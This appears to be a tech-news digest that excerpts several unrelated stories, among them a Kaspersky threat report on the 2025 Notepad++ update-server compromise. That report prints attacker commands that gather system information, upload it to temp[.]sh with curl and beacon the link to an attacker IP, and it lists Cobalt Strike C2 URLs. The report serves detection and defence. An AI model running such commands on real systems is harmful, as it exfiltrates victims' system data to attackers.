10 interesting stories served every morning and every evening.
Before you read this post, ask yourself a question: When was the last time you truly thought hard?
By “thinking hard,” I mean encountering a specific, difficult problem and spending multiple days just sitting with it to overcome it.
a) All the time. b) Never. c) Somewhere in between.
If your answer is (a) or (b), this post isn’t for you. But if, like me, your response is (c), you might get something out of this, if only the feeling that you aren’t alone.
First, a disclaimer: this post has no answers, not even suggestions. It is simply a way to vent something I’ve been feeling for the last few months.
I believe my personality is built on two primary traits:
The Builder (The desire to create, ship, and be pragmatic).
The Thinker (The need for deep, prolonged mental struggle).
The builder is pretty self explanatory, it’s motivated by velocity and utility. It is the part of me that craves the transition from “idea” to “reality.” It loves the dopamine hit of a successful deploy, the satisfaction of building systems to solve real problems, and the knowledge that someone, somewhere, is using my tool.
To explain the Thinker , I need to go back to my university days studying physics. Every now and then, we would get homework problems that were significantly harder than average. Even if you had a decent grasp of the subject, just coming up with an approach was difficult.
I observed that students fell into three categories when facing these problems (well, four, if you count the 1% of geniuses for whom no problem was too hard).
* Type 1: The majority. After a few tries, they gave up and went to the professor or a TA for help.
* Type 2: The Researchers. They went to the library to look for similar problems or insights to make the problem approachable. They usually succeeded.
I fell into the third category, which, in my experience, was almost as rare as the genius 1%. My method was simply to think. To think hard and long. Often for several days or weeks, all my non-I/O brain time was relentlessly chewing on possible ways to solve the problem, even while I was asleep.
This method never failed me. I always felt that deep prolonged thinking was my superpower. I might not be as fast or naturally gifted as the top 1%, but given enough time, I was confident I could solve anything. I felt a deep satisfaction in that process.
That satisfaction is why software engineering was initially so gratifying. It hit the right balance. It satisfied The Builder (feeling productive and pragmatic by creating useful things) and The Thinker (solving really hard problems). Thinking back, the projects where I grew the most as an engineer were always the ones with a good number of really hard problems that needed creative solutions.
But recently, the number of times I truly ponder a problem for more than a couple of hours has decreased tremendously.
Yes, I blame AI for this.
I am currently writing much more, and more complicated software than ever, yet I feel I am not growing as an engineer at all. When I started meditating on why I felt “stuck,” I realized I am starving The Thinker.
“Vibe coding” satisfies the Builder. It feels great to see to pass from idea to reality in a fraction of a time that would take otherwise. But it has drastically cut the times I need to came up with creative solutions for technical problems. I know many people who are purely Builders, for them this era is the best thing that ever happened. But for me, something is missing.
I know what you might be thinking: “If you can ‘vibe code’ your way through it, the problem wasn’t actually hard.”
I think that misses the point. It’s not that AI is good for hard problems, it’s not even that good for easy problems. I’m confident that my third manual rewrite of a module would be much better than anything the AI can output. But I am also a pragmatist.
If I can get a solution that is “close enough” in a fraction of the time and effort, it is irrational not to take the AI route. And that is the real problem: I cannot simply turn off my pragmatism.
At the end of the day, I am a Builder. I like building things. The faster I build, the better. Even if I wanted to reject AI and go back to the days where the Thinker’s needs were met by coding, the Builder in me would struggle with the inefficiency.
Even though the AI almost certainly won’t come up with a 100% satisfying solution, the 70% solution it achieves usually hits the “good enough” mark.
To be honest, I don’t know. I am still figuring it out.
I’m not sure if my two halves can be satisfied by coding anymore. You can always aim for harder projects, hoping to find problems where AI fails completely. I still encounter those occasionally, but the number of problems requiring deep creative solutions feels like it is diminishing rapidly.
I have tried to get that feeling of mental growth outside of coding. I tried getting back in touch with physics, reading old textbooks. But that wasn’t successful either. It is hard to justify spending time and mental effort solving physics problems that aren’t relevant or state-of-the-art when I know I could be building things.
My Builder side won’t let me just sit and think about unsolved problems, and my Thinker side is starving while I vibe-code. I am not sure if there will ever be a time again when both needs can be met at once.
“Now we have the right to give this being the well-known name that always designates what no power of imagination, no flight of the boldest fantasy, no intently devout heart, no abstract thinking however profound, no enraptured and transported spirit has ever attained: God. But this basic unity is of the past; it no longer is. It has, by changing its being, totally and completely shattered itself. God has died and his death was the life of the world.”
- Philipp Mainländer
...
Read the original on www.jernesto.com »
1 year ago (Jan 2025) I quit my job as a software engineer to launch my first hardware product, Brighter, the world’s brightest lamp. In March, after $400k in sales through our crowdfunding campaign, I had to figure out how to manufacture 500 units for our first batch. I had no prior experience in hardware; I was counting on being able to pick it up quickly with the help of a couple of mechanical/electrical/firmware engineers.
The problems began immediately. I sent our prototype to a testing lab to verify the brightness and various colorimetry metrics. The tagline of Brighter was it’s 50,000 lumens — 25x brighter than a normal lamp. Instead, despite our planning & calculations, it tested at 39,000 lumens causing me to panic (just a little).
So with all hands on deck, in a couple of weeks we increased the power by 20%, redesigned the electronics to handle more LEDs, increased the size of the heatsink to dissipate the extra power, and improved the transmission of light through the diffuser.
This time, we overshot to 60,000 lumens but I’m not complaining.
Confident in our new design I gave the go ahead to our main contract manufacturer in China to start production of mechanical parts. The heatsink had the longest lead time as it required a massive two ton die casting mold machined over the course of weeks. I planned my first trip to China for when the process would finish.
Simultaneously in April, Trump announced “Liberation Day” tariffs, taking the tariff rate for the lamp to 50%, promptly climbing to 100% then 150% with the ensuing trade war. That was the worst period of my life; I would go to bed literally shaking with stress. In my opinion, Not Cool!
I was advised to press forward with manufacturing because 150% is bonkers and will have to go down. So 2 months later in Zhongshan, China, I’m staring at a heatsink that looks completely fucked. Due to a miscommunication with the factory, the injection pins were moved inside the heatsink fins, causing the cylindrical extrusions below. I was just glad at least the factory existed.
I returned in August to test the full assembly with the now correct heatsink. At my electronics factory as soon as we connect all the wiring, we notice the controls are completely unresponsive. By Murphy’s Law (anything that can go wrong will go wrong), I had expected something like this to happen, so I made sure to visit the factory at 10am China Standard time, allowing me to coordinate with my electrical engineer at 9pm ET and my firmware engineer at 7:30am IST. We’re measuring voltages across every part of the lamp and none of it makes sense. I postpone my next supplier visit a couple days so I can get this sorted out. At the end of the day, we finally notice the labels on two PCB pins were swapped.
With a functional fully assembled lamp, we OK mass production of the electronics.
Our first full pieces from the production line come out mid October. I airship them to San Francisco, and hand deliver to our first customers. The rest are scheduled for container loading end of October.
People like the light! A big SF startup orders a lot more. However, there is one issue I hear multiple times: the knobs are scraping and feel horrible. With days until the 500 units are loaded into the container, I frantically call with the engineering team and factory. Obviously this shouldn’t be happening, we designed a gap between the knobs and the wall to spin freely. After rounds of back and forth and measurements, we figure out in the design for manufacturing (DFM) process, the drawings the CNC sub-supplier received did not have the label for spacing between the knobs, resulting in a 0.5mm larger distance than intended. Especially combined with the white powder coating which was thicker than the black finish, this caused some knobs to scrape.
Miraculously, within the remaining days before shipment, the factory remakes & powder coats 1000 new knobs that are 1mm smaller in diameter.
The factory sends me photos of the container being loaded. I have 3 weeks until the lamps arrive in the US — I enjoy the time without last minute engineering problems, albeit knowing inevitably problems will appear again when customers start getting their lamps.
The lamps are processed by our warehouse Monday, Dec 12th, and shipped out directly to customers via UPS. Starting Wednesday, around ~100 lamps are getting delivered every day. I wake up to 25 customer support emails and by the time I’m done answering them, I get 25 more. The primary issue people have is the bottom wires are too short compared to the tubes.
It was at this point I truly began to appreciate Murphy’s law. In my case, anything not precisely specified and tested would without fail go wrong and bite me in the ass. Although we had specified the total length of the cable, we didn’t define the length of cable protruding from the base. As such, some assembly workers in the factory put far too much wire in the base of the lamp, not leaving enough for it to be assembled. Luckily customers were able to fix this by unscrewing the base, but far from an ideal experience.
There were other instances of quality control where I laughed at the absurdity: the lamp comes with a sheet of glass that goes over the LEDs, and a screwdriver & screws to attach it. For one customer, the screwdriver completely broke. (First time in my life I’ve seen a broken screwdriver…) For others, it came dull. The screwdriver sub supplier also shipped us two different types of screws, some of which were perfect, and others which were countersunk and consequently too short to be actually screwed in.
Coming from software, the most planning you’re exposed to is linear tickets, sprints, and setting OKRs. If you missed a deadline, it’s often because you re-prioritized, so no harm done.
In hardware, the development lifecycle of a product is many months. If you mess up tooling, or mass produce a part incorrectly, or just sub-optimally plan, you set back the timeline appreciably and there’s nothing you can do but curse yourself. I found myself reaching for more “old school” planning tools like Gantt charts, and also building my own tools. Make sure you have every step of the process accounted for. Assume you’ll go through many iterations of the same part; double your timelines.
In software, budgeting is fairly lax, especially in the VC funded startup space where all you need to know is your runway (mainly calculated from your employee salaries and cloud costs).
With [profitable] hardware businesses, your margin for error is much lower. Literally, your gross margin is lower! If you sell out because you miss a shipment or don’t forecast demand correctly, you lose revenue. If you mis-time your inventory buying, your bank account can easily go negative. Accounting is a must, and the more detailed the better. Spreadsheets are your best friend. The funding model is also much different: instead of relying heavily on equity, most growth is debt-financed. You have real liabilities!
Anything that can go wrong will go wrong. Anything you don’t specify will fail to meet the implicit specification. Any project or component not actively pushed will stall. At previous (software) companies I’ve worked at, if someone followed up on a task, I took it to mean the task was off track and somebody was to blame. With a hardware product, there are a million balls in the air and you need to keep track of all of them. Though somewhat annoying, constant checkins simply math-out to be necessary. The cost of failure or delays is too high. Nowadays as a container gets closer to shipment date, I have daily calls with my factories. I found myself agreeing with a lot of Ben Kuhn’s blog post on running major projects (his blog post on lighting was also a major inspiration for the product).
When I worked at Meta, every PR had to be accompanied with a test plan. I took that philosophy to Brighter, trying to rigorously test the outcomes we were aiming for (thermals, lumens, power, etc…), but I still encountered surprising failures. In software if you have coverage for a code path, you can feel pretty confident about it. Unfortunately hardware is almost the opposite of repeatable. Blink and you’ll get a different measurement. I’m not an expert, but at this point I’ve accepted the only way to get a semblance of confidence for my metrics is testing on multiple units in different environments.
As someone who generally stays out of politics, I didn’t know much about the incoming administration’s stance towards tariffs, though I don’t think anyone could have predicted such drastic hikes. Regardless, it’s something you should be acutely aware of; take it into consideration when deciding what country to manufacture in, make sure it’s in your financial models with room to spare, etc…
I wish I had visited my suppliers much earlier, back when we were still prototyping with them. Price shouldn’t be an issue — a trip to China is going to be trivially cheap compared to buying inventory, even more so compared to messing up a manufacturing run due to miscommunication. Most suppliers don’t get international visitors often, especially Americans. Appearing in person conveys seriousness, and I found it greatly improved communication basically immediately after my first visit. Plus China is very different from the US and it’s cool to see!
To me, this process has felt like an exercise in making mistakes and learning painful lessons. However, I think I did do a couple of key things right:
The first thing I did before starting manufacturing—and even before the crowdfunding campaign—was setting up a simple website where people could pay $10 to get a steep discount off the MSRP. Before I committed time and money, I needed to know this would be self-sustaining from the get go. It turns out that people were happy to give their email and put down a deposit, even when the only product photos I had were from a render artist on fiverr!
From talking to other hardware founders, these kinds of mistakes happen to everyone; hardware is hard as they say. It’s important to have a healthy enough business model to stomach these mistakes and still be able to grow.
Coolest Cooler had an incredibly successful crowdfunding campaign, partly because they packed a lot of features into a very attractively priced product. Unfortunately, it was too attractively priced, and partway through manufacturing they realized they didn’t have enough money to actually deliver all the units, leading to a slow and painful bankruptcy.
When the first 500 units were being delivered, I knew there were bound to be issues. For that first week, I was literally chronically on my gmail. I would try to respond to every customer support issue within 1-2 minutes if possible (it was not conducive to my sleep that many of our customers were in the EU).
Some customers still had some issues with the control tube knobs & firmware. I acknowledged that they were subpar and decided to re-make the full batch of control tubes properly (with the correct knob spacing), as well as updated firmware & other improvements, and ship them to customers free of charge.
Overall, it’s been a very different but incredibly rewarding experience compared to working as a software engineer. It’s so cool to see something I built in my friends houses, and equally cool when people leave completely unprompted reviews:
...
Read the original on www.simonberens.com »
“The reports about Grok raise deeply troubling questions about how people’s personal data has been used to generate intimate or sexualised images without their knowledge or consent, and whether the necessary safeguards were put in place to prevent this,” said William Malcolm, the ICO’s executive director for regulatory risk & innovation.
...
Read the original on www.bbc.com »
Craftplan brings all essential business tools into one platform: catalog management, inventory control, order processing, production planning, purchasing, and CRM, so you can get off the ground quickly without paying for multiple separate platforms.
* iCal (.ics) subscription URL for Google Calendar, Apple Calendar, or any iCal-compatible app
* Command palette (Cmd+K / Ctrl+K) for instant access to any record
Deploy Craftplan on your own server. No need to clone the repo:
curl -O https://raw.githubusercontent.com/puemos/craftplan/main/docker-compose.yml
curl -O https://raw.githubusercontent.com/puemos/craftplan/main/.env.example
cp .env.example .env # Fill in the required secrets (see .env.example)
docker compose up -d
This starts Craftplan, PostgreSQL, and MinIO with migrations running automatically.
See the self-hosting guide for single-container mode, Railway deployment, reverse proxy setup, and more.
For contributors who want to work on the codebase. Prerequisites: Docker, Elixir ~> 1.15, Erlang/OTP 27
docker compose -f docker-compose.dev.yml up -d # Start PostgreSQL + MinIO + Mailpit
mix setup # Install deps, migrate, build assets, seed
mix phx.server # Start at localhost:4000
See the development setup guide for detailed instructions.
* Purpose-built for artisanal manufacturing — not a generic ERP adapted to fit; workflows are designed around small-batch, made-to-order production
* Allergen & nutritional tracking — first-class support for food and beverage producers who need to track ingredients and generate nutrition labels
* BOM versioning with cost rollups — iterate on recipes and formulas while keeping full history and accurate costing
* Self-hosted, no vendor lock-in — your data stays on your infrastructure, backed by PostgreSQL
Contributions are welcome. For major changes, please open an issue first to discuss your proposal.
mix test # Run the test suite
mix format # Format code (Styler, Spark, Tailwind, HEEx)
This project is licensed under the AGPLv3 License. See the LICENSE file for details.
...
Read the original on github.com »
The FBI has been unable to access a Washington Post reporter’s seized iPhone because it was in Lockdown Mode, a sometimes overlooked feature that makes iPhones broadly more secure, according to recently filed court records.
The court record shows what devices and data the FBI was able to ultimately access, and which devices it could not, after raiding the home of the reporter, Hannah Natanson, in January as part of an investigation into leaks of classified information. It also provides rare insight into the apparent effectiveness of Lockdown Mode, or at least how effective it might be before the FBI may try other techniques to access the device.
...
Read the original on www.404media.co »
On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ had been compromised. According to the statement, this was due to a hosting provider-level incident, which occurred from June to September 2025. However, attackers had been able to retain access to internal services until December 2025.
Having checked our telemetry related to this incident, we were amazed to find out how different and unique the execution chains used in this supply chain attack were. We identified that over the course of four months, from July to October 2025, attackers who had compromised Notepad++ had been constantly rotating C2 server addresses used for distributing malicious updates, the downloaders used for implant delivery, as well as the final payloads.
We observed three different infection chains overall, designed to attack about a dozen machines, belonging to:
* An IT service provider organization located in Vietnam.
Despite the variety of payloads observed, Kaspersky solutions were able to block the identified attacks as they occurred.
In this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack, as well as provide numerous previously unpublished IoCs related to it.
We observed attackers to deploy a malicious Notepad++ update for the first time in late July 2025. It was hosted at http://45.76.155[.]202/update/update.exe. Notably, the first scan of this URL on the VirusTotal platform occurred in late September, by a user from Taiwan.
The update.exe file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the legitimate Notepad++ updater process, GUP.exe. This file turned out to be a NSIS installer about 1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
The file creates a directory named %appdata%\ProShow and sets it as the current directory;
It executes the shell command cmd /c whoami&&tasklist > 1.txt, thus creating a file with the shell command execution results in the %appdata%\ProShow directory;
Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F “file=@1.txt” -s https://temp.sh/upload command;
Next, it sends the URL to the uploaded 1.txt file by using the curl.exe –user-agent “https://temp.sh/ZMRKV/1.txt” -s http://45.76.155[.]202 shell command. As can be observed, the uploaded file URL is transferred inside the user agent.
Notably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the use of the temp[.]sh website for file uploading, was described on the Notepad++ community forums by a user named soft-parsley.
After sending system information, the update.exe file executes the second-stage payload. To do that, it performs the following actions:
* Drops the following files to the %appdata%\ProShow directory:
The ProShow.exe file being launched is legitimate ProShow software, which is abused to launch a malicious payload. Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort to the DLL sideloading technique. However, this time attackers decided to avoid using it — likely due to how much attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the ProShow software, which dates back to early 2010s. The dropped file named load contains an exploit payload, which is launched when the ProShow.exe file is launched. It is worth noting that, apart from this payload, all files in the %appdata%\ProShow directory are legitimate.
Analysis of the exploit payload revealed that it contained two shellcodes: one at the very start and the other one in the middle of the file. The shellcode located at the start of the file contained a set of meaningless instructions and was not designed to be executed — rather, attackers used it as the exploit padding bytes. It is likely that, by using a fake shellcode for padding bytes instead of something else (e.g., a sequence of 0x41 characters or random bytes), attackers aimed to confuse researchers and automated analysis systems.
The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.
The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
Later on, in early August 2025, we observed attackers to use the same download URL for the update.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for delivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:
* In the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to https://cdncheck.it[.]com/users/admin;
* The Cobalt Strike C2 server URLs were set to https://cdncheck.it[.]com/api/update/v1 and https://cdncheck.it[.]com/api/Metadata/submit.
We have not further seen any infections leveraging chain #1 since early August 2025.
A month and a half after malicious update detections ceased, we observed attackers to resume deploying these updates in the middle of September 2025, using another infection chain. The malicious update was still being distributed from the URL http://45.76.155[.]202/update/update.exe, and the file downloaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now about 140 KB. Again, this file performed two actions:
* Obtained system information by executing a shell command and uploading its execution results to temp[.]sh;
* Dropped a next-stage payload on disk and launched it.
Regarding system information, attackers made the following changes to how it was collected:
* They changed the working directory to %APPDATA%\Adobe\Scripts;
* They started collecting more system information details, changing the shell command being executed to cmd /c “whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt.
The created a.txt file was, just as in the case of stage #1, uploaded to the temp[.]sh website through curl, with the obtained temp[.]sh URL being transferred to the same http://45.76.155[.]202/list endpoint, inside the User-Agent header.
As for the next-stage payload, it was changed completely. The NSIS installer was configured to drop the following files into the %APPDATA%\Adobe\Scripts directory:
Next, it executes the following shell command to launch the script.exe file: %APPDATA%\%Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.
All of the files in the %APPDATA%\Adobe\Scripts directory, except for alien.ini, are legitimate and related to the Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua script, located in the alien.ini file. Below is a screenshot of its decompilation:
As we can see, this small script is used for placing shellcode inside executable memory and then launching it through the EnumWindowStationsW API function.
The launched shellcode is, just in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike Beacon payload, again in the form of a shellcode, from the URL https://cdncheck.it[.]com/users/admin.
The Cobalt Strike payload contains the C2 server URLs that slightly differ from the ones seen previously: https://cdncheck.it[.]com/api/getInfo/v1 and https://cdncheck.it[.]com/api/FileUpload/submit.
Attacks involving chain #2 continued until the end of September, when we observed two more malicious update.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon payload delivered through it was configured to use the same URLs observed in mid-September, however, attackers changed the way system information was collected. Specifically, attackers split the single shell command they used for this (cmd /c “whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt) into multiple commands:
Notably, the same sequence of commands was previously documented by the user soft-parsley on the Notepad++ community forums.
The other update.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. By using it, attackers performed the following:
* Changed the user agent used in HTTP requests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;
* Changed the URL used by the Metasploit downloader to https://safe-dns.it[.]com/help/Get-Start;
* Changed the Cobalt Strike Beacon C2 server URLs to https://safe-dns.it[.]com/resolve and https://safe-dns.it[.]com/dns-query.
In early October 2025, the attackers changed the infection chain once again. They also changed the C2 server for distributing malicious updates, with the observed update URL being http://45.32.144[.]255/update/update.exe. The payload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still a NSIS installer, however, unlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. It simply dropped the following files to the %appdata%\Bluetooth\ directory:
This execution chain relies on the sideloading of the log.dll file, which is responsible for launching the encrypted BluetoothService shellcode into the BluetoothService.exe process. Notably, such execution chains are commonly used by Chinese-speaking threat actors. This particular execution chain has already been described by Rapid7, and the final payload observed in it is the custom Chrysalis backdoor.
Unlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. However, in their article Rapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the C:\ProgramData\USOShared folder, while conducting incident response on one of the machines infected by the Notepad++ supply chain attack. Whilst Rapid7 does not detail how this file was dropped to the victim machine, we can highlight the following similarities between that Beacon payload and the Beacon payloads observed in chains #1 and #2:
In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used (api.wiresguard.com/users/admin for the Rapid7 payload, cdncheck.it.com/users/admin and http://45.77.31[.]210/users/admin for chain #1 and chain #2 payloads);
The Beacon configurations are encrypted with the XOR key CRAZY;
Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e. api.wiresguard.com/api/FileUpload/submit for the Rapid7 payload and https://45.77.31[.]210/api/FileUpload/submit for the chain #1 payload).
In mid-October 2025, we observed attackers to resume deployments of the chain #2 payload (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http://95.179.213[.]0/update/update.exe. Still, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system information uploading, Metasploit downloader and Cobalt Strike Beacon communications.
Further in late October 2025, we observed attackers to start changing URLs used for malicious update deliveries. Specifically, attackers started using the following URLs:
We didn’t observe any new payloads deployed from these URLs — they involved usage of both #2 and #3 execution chains. Finally, we didn’t see any payloads being deployed since November 2025.
Notepad++ is a text editor used by numerous developers. As such, the ability to control update servers of this software gave the attackers a unique possibility to break into machines of high-profile organizations around the world. The attackers made an effort to avoid losing access to this infection vector — they were spreading the malicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains about once a month. Whilst we identified three distinct infection chains during our investigation, we would not be surprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains that we identified:
The variety of infection chains makes detection of the Notepad++ supply chain attack quite a difficult, and at the same time creative, task. We would like to propose the following methods, from generic to specific, to hunt down traces of this attack:
* Check systems for deployments of NSIS installers, which were used in all three observed execution chains. For example, this can be done by looking for logs related to creations of a %localappdata%\Temp\ns.tmp directory, made by NSIS installers at runtime. Make sure to investigate the origins of each identified NSIS installer to avoid false positives;
* Check network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual to observe in corporate environments. Also, it is beneficial to conduct a check for raw HTTP traffic requests that have a temp[.]sh URL embedded in the user agent — both these steps will make it possible to detect chain #1 and chain #2 deployments;
* Check systems for launches of malicious shell commands referenced in the article, such as whoami, tasklist, systeminfo and netstat -ano;
* Use the specific IoCs listed below to identify known malicious domains and files.
Kaspersky security solutions, such as Kaspersky Next Endpoint Detection and Response Expert, successfully detect malicious activity in the attacks described above.
Let’s take a closer look at Kaspersky Next EDR Expert.
One way to detect the described malicious activity is to monitor requests to LOLC2 (Living-Off-the-Land C2) services, which include temp[.]sh. Attackers use such services as intermediate control or delivery points for malicious payloads, masking C2 communication as legitimate web traffic. KEDR Expert detects this activity using the lolc2_connection_activity_network rule.
In addition, the described activity can be detected by executing typical local reconnaissance commands that attackers launch in the early stages of an attack after gaining access to the system. These commands allow the attacker to quickly obtain information about the environment, access rights, running processes, and network connections to plan further actions. KEDR Expert detects such activity using the following rules: system_owner_user_discovery, using_whoami_to_check_that_current_user_is_admin, system_information_discovery_win, system_network_connections_discovery_via_standard_windows_utilities.
In this case, a clear sign of malicious activity is gaining persistence through the autorun mechanism via the Windows registry, specifically the Run key, which ensures that programs start automatically when the user logs in. KEDR Expert detects this activity using the temporary_folder_in_registry_autorun rule.
URLs used by Metasploit downloaders to deploy Cobalt Strike beacons
https://45.77.31[.]210/users/admin
https://cdncheck.it[.]com/users/admin
https://safe-dns.it[.]com/help/Get-Start
URLs used by Cobalt Strike Beacons delivered by malicious Notepad++ updaters
https://45.77.31[.]210/api/update/v1
https://45.77.31[.]210/api/FileUpload/submit
https://cdncheck.it[.]com/api/update/v1
https://cdncheck.it[.]com/api/Metadata/submit
https://cdncheck.it[.]com/api/getInfo/v1
https://cdncheck.it[.]com/api/FileUpload/submit
https://safe-dns.it[.]com/resolve
https://safe-dns.it[.]com/dns-query
URLs used by the Chrysalis backdoor and the Cobalt Strike Beacon payloads associated with it, as previously identified by Rapid7
https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821
https://api.wiresguard[.]com/update/v1
https://api.wiresguard[.]com/api/FileUpload/submit
URLs related to Cobalt Strike Beacons uploaded to multiscanners, as previously identified by Rapid7
http://59.110.7[.]32:8880/uffhxpSy
http://59.110.7[.]32:8880/api/getBasicInfo/v1
http://59.110.7[.]32:8880/api/Metadata/submit
http://124.222.137[.]114:9999/3yZR31VK
http://124.222.137[.]114:9999/api/updateStatus/v1
http://124.222.137[.]114:9999/api/Info/submit
...
Read the original on securelist.com »
Today, we’re releasing Voxtral Transcribe 2, two next-generation speech-to-text models with state-of-the-art transcription quality, diarization, and ultra-low latency. The family includes Voxtral Mini Transcribe V2 for batch transcription and Voxtral Realtime for live applications. Voxtral Realtime is open-weights under the Apache 2.0 license.
We’re also launching an audio playground in Mistral Studio to test transcription instantly, powered by Voxtral Transcribe 2, with diarization and timestamps.
Voxtral Mini Transcribe V2: State-of-the-art transcription with speaker diarization, context biasing, and word-level timestamps in 13 languages.
Voxtral Realtime: Purpose-built for live transcription with latency configurable down to sub-200ms, enabling voice agents and real-time applications.
Best-in-class efficiency: Industry-leading accuracy at a fraction of the cost, with Voxtral Mini Transcribe V2 achieving the lowest word error rate, at the lowest price point.
Open weights: Voxtral Realtime ships under Apache 2.0, deployable on edge for privacy-first applications.
Voxtral Realtime is purpose-built for applications where latency matters. Unlike approaches that adapt offline models by processing audio in chunks, Realtime uses a novel streaming architecture that transcribes audio as it arrives. The model delivers transcriptions with delay configurable down to sub-200ms, unlocking a new class of voice-first applications.
Word error rate (lower is better) across languages in the FLEURS transcription benchmark.
At 2.4 seconds delay, ideal for subtitling, Realtime matches Voxtral Mini Transcribe V2, our latest batch model. At 480ms delay, it stays within 1-2% word error rate, enabling voice agents with near-offline accuracy.
The model is natively multilingual, achieving strong transcription performance in 13 languages, including English, Chinese, Hindi, Spanish, Arabic, French, Portuguese, Russian, German, Japanese, Korean, Italian, and Dutch. With a 4B parameter footprint, it runs efficiently on edge devices, ensuring privacy and security for sensitive deployments.
We’re releasing the model weights under Apache 2.0 on the Hugging Face Hub.
Average diarization error rate (lower is better) across five English benchmarks (Switchboard, CallHome, AMI-IHM, AMI-SDM, SBCSAE) and the TalkBank multilingual benchmark (German, Spanish, English, Chinese, Japanese).
Average word error rate (lower is better) across the top-10 languages in the FLEURS transcription benchmark.
Voxtral Mini Transcribe V2 delivers significant improvements in transcription and diarization quality across languages and domains. At approximately 4% word error rate on FLEURS and $0.003/min, Voxtral offers the best price-performance of any transcription API. It outperforms GPT-4o mini Transcribe, Gemini 2.5 Flash, Assembly Universal, and Deepgram Nova on accuracy, and processes audio approximately 3x faster than ElevenLabs’ Scribe v2 while matching on quality at one-fifth the cost.
Generate transcriptions with speaker labels and precise start/end times. Ideal for meeting transcription, interview analysis, and multi-party call processing. Note: with overlapping speech, the model typically transcribes one speaker.
Provide up to 100 words or phrases to guide the model toward correct spellings of names, technical terms, or domain-specific vocabulary. Particularly useful for proper nouns or industry terminology that standard models often miss. Context biasing is optimized for English; support for other languages is experimental.
Generate precise start and end timestamps for each word, enabling applications like subtitle generation, audio search, and content alignment.
Like Realtime, this model now supports 13 languages: English, Chinese, Hindi, Spanish, Arabic, French, Portuguese, Russian, German, Japanese, Korean, Italian, and Dutch. Non-English performance significantly outpaces competitors.
Maintains transcription accuracy in challenging acoustic environments, such as factory floors, busy call centers, and field recordings.
Process recordings up to 3 hours in a single request.
Word error rate (lower is better) across languages in the FLEURS transcription benchmark.
Test Voxtral Transcribe 2 directly in Mistral Studio. Upload up to 10 audio files, toggle diarization, choose timestamp granularity, and add context bias terms for domain-specific vocabulary. Supports .mp3, .wav, .m4a, .flac, .ogg up to 1GB each.
Transcribe multilingual recordings with speaker diarization that clearly attributes who said what and when. At Voxtral’s price point, annotate large volumes of meeting content at industry-leading cost efficiency.
Build conversational AI with sub-200ms transcription latency. Connect Voxtral Realtime to your LLM and TTS pipeline for responsive voice interfaces that feel natural.
Transcribe calls in real time, enabling AI systems to analyze sentiment, suggest responses, and populate CRM fields while conversations are still happening. Speaker diarization ensures clear attribution between agents and customers.
Generate live multilingual subtitles with minimal latency. Context biasing handles proper nouns and technical terminology that trip up generic transcription services.
Monitor and transcribe interactions for regulatory compliance, with diarization providing clear speaker attribution and timestamps enabling precise audit trails.
Both models support GDPR and HIPAA-compliant deployments through secure on-premise or private cloud setups.
Voxtral Mini Transcribe V2 is available now via API at $0.003 per minute. Try it now in the new Mistral Studio audio playground or in Le Chat.
Voxtral Realtime is available via API at $0.006 per minute and as open weights on Hugging Face.
If you’re excited about building world-class speech AI and putting frontier models into the hands of developers everywhere, we’d love to hear from you. Apply to join our team.
The next chapter of AI is yours.
...
Read the original on mistral.ai »
If you find this useful, please ⭐ star the repo — it helps others discover it!
A production-ready Model Context Protocol (MCP) server that bridges Ghidra’s powerful reverse engineering capabilities with modern AI tools and automation frameworks.
# Windows - run the provided batch script
copy-ghidra-libs.bat “C:\path\to\ghidra_12.0.2_PUBLIC”
# Linux/Mac - copy manually from your Ghidra installation
# See Library Dependencies section below for all 14 required JARs
python bridge_mcp_ghidra.py
python bridge_mcp_ghidra.py –transport sse –mcp-host 127.0.0.1 –mcp-port 8081
The server runs on http://127.0.0.1:8080/ by default
# Build the plugin (skip integration tests)
mvn clean package assembly:single -DskipTests
# Deploy to Ghidra
